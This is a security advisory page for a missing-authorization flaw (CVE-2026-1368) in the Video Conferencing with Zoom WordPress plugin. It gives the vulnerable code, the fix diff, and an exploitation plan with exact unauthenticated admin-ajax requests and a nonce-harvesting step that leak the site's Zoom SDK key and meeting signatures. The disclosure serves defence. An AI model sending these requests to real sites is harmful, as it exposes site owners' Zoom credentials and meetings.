Video Conferencing with Zoom < 4.6.6 - Missing Authorization
Description
The Video Conferencing with Zoom plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in versions up to 4.6.6. This makes it possible for unauthenticated attackers to perform an unauthorized action.
CVSS Vector Breakdown
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:NTechnical Details
<4.6.6What Changed in the Fix
Changes introduced in v4.6.6
Source Code
WordPress.org SVN# Exploitation Research Plan: CVE-2026-1368 (Video Conferencing with Zoom < 4.6.6) ## 1. Vulnerability Summary The **Video Conferencing with Zoom** plugin for WordPress is vulnerable to **Missing Authorization** in its AJAX handlers. Specifically, the function `get_auth` in `includes/admin/class-zv…
Show full research plan
Exploitation Research Plan: CVE-2026-1368 (Video Conferencing with Zoom < 4.6.6)
1. Vulnerability Summary
The Video Conferencing with Zoom plugin for WordPress is vulnerable to Missing Authorization in its AJAX handlers. Specifically, the function get_auth in includes/admin/class-zvc-admin-ajax.php is registered with the wp_ajax_nopriv_ hook, making it accessible to unauthenticated users.
Crucially, the code contains a commented-out nonce check, meaning the function performs no authorization or CSRF validation. This allows an unauthenticated attacker to generate valid Zoom Web SDK signatures for any meeting ID and retrieve the site's Zoom SDK Key. Additionally, the state_change function is also exposed via nopriv, potentially allowing attackers to modify meeting states if a nonce can be obtained.
2. Attack Vector Analysis
- Endpoint:
/wp-admin/admin-ajax.php - Action:
get_auth(and secondarystate_change) - HTTP Method:
POST - Authentication: None (Unauthenticated)
- Vulnerable Parameter:
meeting_id(forget_auth),idandstate(forstate_change) - Preconditions:
- The Zoom SDK must be configured/enabled in the plugin settings (specifically
vczapi_sdk_keyandvczapi_sdk_secret_keymust be set).
- The Zoom SDK must be configured/enabled in the plugin settings (specifically
3. Code Flow
- Entry Point: The plugin registers AJAX hooks in
Zoom_Video_Conferencing_Admin_Ajax::__construct()(Line 19):add_action( 'wp_ajax_nopriv_get_auth', array( $this, 'get_auth' ) ); - Vulnerable Sink: The
get_auth()function (Lines 159-172) is executed:public function get_auth() { // check_ajax_referer( '_nonce_zvc_security', 'noncce' ); // <--- NONCE CHECK COMMENTED OUT $meeting_id = filter_input( INPUT_POST, 'meeting_id' ); if ( vczapi_is_sdk_enabled() ) { $sdk_key = get_option( 'vczapi_sdk_key' ); $secret_key = get_option( 'vczapi_sdk_secret_key' ); $signature = $this->generate_sdk_signature( $sdk_key, $secret_key, $meeting_id, 0 ); wp_send_json_success( [ 'sig' => $signature, 'key' => $sdk_key, 'type' => 'sdk' ] ); } - Execution: The plugin fetches the sensitive
vczapi_sdk_secret_keyfrom the database to sign a JWT, and returns the signature (sig) and thevczapi_sdk_keyto the unauthenticated requester.
4. Nonce Acquisition Strategy
Primary Target: get_auth
No nonce is required. The source code explicitly shows the check_ajax_referer call is commented out:// check_ajax_referer( '_nonce_zvc_security', 'noncce' );
Secondary Target: state_change
The state_change function is also nopriv but checks a nonce:check_ajax_referer( '_nonce_zvc_security', 'accss' );
To obtain _nonce_zvc_security:
- Shortcode: The plugin likely enqueues this nonce on pages using the
[zoom_join_via_browser](inferred) shortcode or on single meeting posts. - Strategy:
- Create a Zoom Meeting post or a page with the join shortcode.
- Navigate to the page.
- Use
browser_evalto find the nonce in the localized script object. Based on common plugin patterns, it is likely under a global object likevczapi_ajax. - JS Check:
browser_eval("window.vczapi_ajax?.loading_nonce")(inferred) or check the source for_nonce_zvc_security.
5. Exploitation Strategy
Request 1: Generate Meeting Signature (Unauthenticated)
- URL:
http://localhost:8080/wp-admin/admin-ajax.php - Method:
POST - Headers:
Content-Type: application/x-www-form-urlencoded - Body:
action=get_auth&meeting_id=888999111 - Goal: Retrieve the
sig(JWT) andkey(SDK Key).
Request 2: Change Meeting State (Unauthenticated - if Nonce is Found)
- URL:
http://localhost:8080/wp-admin/admin-ajax.php - Method:
POST - Body:
action=state_change&accss=[EXTRACTED_NONCE]&id=[MEETING_ID]&state=ended&type=meeting - Goal: Unauthorized modification of meeting lifecycle.
6. Test Data Setup
- Configure Zoom SDK: Use WP-CLI to simulate a configured environment:
wp option update vczapi_sdk_key "AKIA-FAKE-SDK-KEY" wp option update vczapi_sdk_secret_key "FAKE-SECRET-KEY-SDFGHSDFGHSDFGH" # vczapi_is_sdk_enabled() likely checks for these or a specific toggle: wp option update vczapi_sdk_enabled 1 - Create a Meeting:
wp post create --post_type=zoom-meetings --post_title="Target Meeting" --post_status=publish
7. Expected Results
- The response to
get_authshould be a200 OKJSON object:{ "success": true, "data": { "sig": "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9...", "key": "AKIA-FAKE-SDK-KEY",
Summary
The Video Conferencing with Zoom plugin for WordPress is vulnerable to missing authorization due to incorrectly configured AJAX handlers and a commented-out security check. This allow unauthenticated attackers to generate valid Zoom SDK signatures for arbitrary meetings and retrieve the site's Zoom SDK Key, which can be used to join meetings or impersonate users within the Zoom Web SDK context.
Vulnerable Code
// includes/admin/class-zvc-admin-ajax.php lines 19-24 add_action( 'wp_ajax_nopriv_get_auth', array( $this, 'get_auth' ) ); add_action( 'wp_ajax_get_auth', array( $this, 'get_auth' ) ); //Call meeting state add_action( 'wp_ajax_nopriv_state_change', array( $this, 'state_change' ) ); add_action( 'wp_ajax_state_change', array( $this, 'state_change' ) ); --- // includes/admin/class-zvc-admin-ajax.php lines 159-172 public function get_auth() { // check_ajax_referer( '_nonce_zvc_security', 'noncce' ); $meeting_id = filter_input( INPUT_POST, 'meeting_id' ); if ( vczapi_is_sdk_enabled() ) { $sdk_key = get_option( 'vczapi_sdk_key' ); $secret_key = get_option( 'vczapi_sdk_secret_key' ); $signature = $this->generate_sdk_signature( $sdk_key, $secret_key, $meeting_id, 0 ); wp_send_json_success( [ 'sig' => $signature, 'key' => $sdk_key, 'type' => 'sdk' ] ); } else { wp_send_json_error( 'Error occured!' ); } wp_die(); }
Security Fix
@@ -159,8 +159,10 @@ */ public function get_auth() { -// check_ajax_referer( '_nonce_zvc_security', 'noncce' ); + check_ajax_referer( '_nonce_zvc_security', 'noncce' ); $meeting_id = filter_input( INPUT_POST, 'meeting_id' ); if ( vczapi_is_sdk_enabled() ) { + if ( ! current_user_can( 'read' ) ) { + wp_send_json_error( __( 'Unauthorized access', 'video-conferencing-with-zoom-api' ) ); + } $sdk_key = get_option( 'vczapi_sdk_key' ); $secret_key = get_option( 'vczapi_sdk_secret_key' );
Exploit Outline
The vulnerability is exploited by interacting with the `get_auth` AJAX action via `admin-ajax.php`. 1. Target Endpoint: Send a POST request to `/wp-admin/admin-ajax.php`. 2. Payload Shape: Set the `action` parameter to `get_auth` and provide an arbitrary `meeting_id` (e.g., 123456789). 3. Authentication: No authentication is required because the action is registered via `wp_ajax_nopriv_` and the internal `check_ajax_referer` call is commented out in vulnerable versions. 4. Result: The server will return a JSON success response containing the site's Zoom SDK Key and a HMAC-SHA256 signature (JWT) which allows the attacker to join the specified meeting through the Zoom Web SDK. Additionally, the `state_change` action is also exposed via `nopriv`, which could allow an attacker to modify meeting statuses if they can obtain a valid security nonce from a public-facing meeting page.
Check if your site is affected.
Run a free security audit to detect vulnerable plugins, outdated versions, and misconfigurations.